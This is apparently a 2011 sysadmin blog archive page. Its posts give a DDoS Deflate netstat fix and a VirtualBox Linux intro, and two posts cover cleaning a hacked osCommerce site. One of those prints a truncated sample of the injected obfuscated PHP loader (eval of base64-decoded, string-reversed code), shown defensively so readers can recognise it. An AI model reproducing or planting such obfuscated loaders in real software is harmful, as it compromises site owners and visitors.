
Showing posts from April 8, 2011

DDOS Deflate fix for wrong email format sent

This one is a fix for the wrong email sent by ddos deflate. edit the configuration and use this line. netstat -ntu | grep ':' | awk '{print $5}' | sed 's/::ffff://' | cut -f1 -d ':' | sort | uniq -c | sort -nr

A encoded script in one of the hacked sites using oscommerce

 A code that was injected to one of the oscommerce sites <?php eval(base64_decode("ZnVuY3Rpb24gZXZhbGhJT29MZ0xLWlltdEooJHMpe2ZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4oJHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPTAzT3BBVFdMbEdUUnhtYzBsa1VxNTBUc0ZtZGxSQ0tsUjJialZHWmZSak5sTlhZaUJpYnlWSGRsSjNlZ2tDTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSm9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9c1RLaTBUUDNKV2IxY1ZZaWdTV0xsR1RSeG1jMGxrVXE1MFRzRm1kbEJTUGdFMVFTRjNZVGwzVklKbFJ5UlZUNXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiN2tpSTkwRVNraG1Vek1tSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWjlNa1laSlZkaGhsZXhsRVMzVjBhd3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXNUS2kwVFBCTkdNU2hVWWlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGwxamUybFhlcVYwWmhSM1EycEhjRnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXN...

Running Linux on Virtual Box

Linux is one of the operating systems out there that is free no need to pay just download and install. For new technical people that want to use this piece of software (yes it's a software not a food) you can download ubuntu, or centos (my choice or even fedora) at Distrowatch.Com where before I check always for new distribution. Like microsoft it has many types example microsoft has windows xp, 2000, Me, 98 Vista, Windows 7 Linux has much more. Linux is like the DOS prompt then developers begin to create window managers for it so it looks like your average windows now. Very easy to install and use. Though you don't want to erase your 1 million dollar software pre installed in your alienware box you have the alternative to use virtualbox the free emulator (something like that in layman's term) you install this first and you can install linux inside the virtualbox like a window when you play windowed games like ragnarok, flyff perfect world and other games. 2 steps ...

Troubleshooting Hacked Oscommerce

First things first, Oscommerce is a good software and we use it. Some old version that we have got hacked (before I get in to the company) To check what files are compromised check the dates of the files thiis is the most important since ou will see what are modified. The fastest way I did was to grep -r 'base64' * since the hacker injected some encrypted code it the files this will let you see what files have the code. I'm not a guru though. delete the lines that shouldn't be there Also they put codes in .htaccess and this will let your website redirect to some other sites .ru site Check also you php.ini since they also get inside of that and put this base decode blah. secure your tmp folder and chmod your file to 755. Also the last measure is to auto block the ip addresses that do lots of connection via anti ddos (dosdeflate) Well then after that hopefully the hackers will get angry and ddos your site till it gets down :)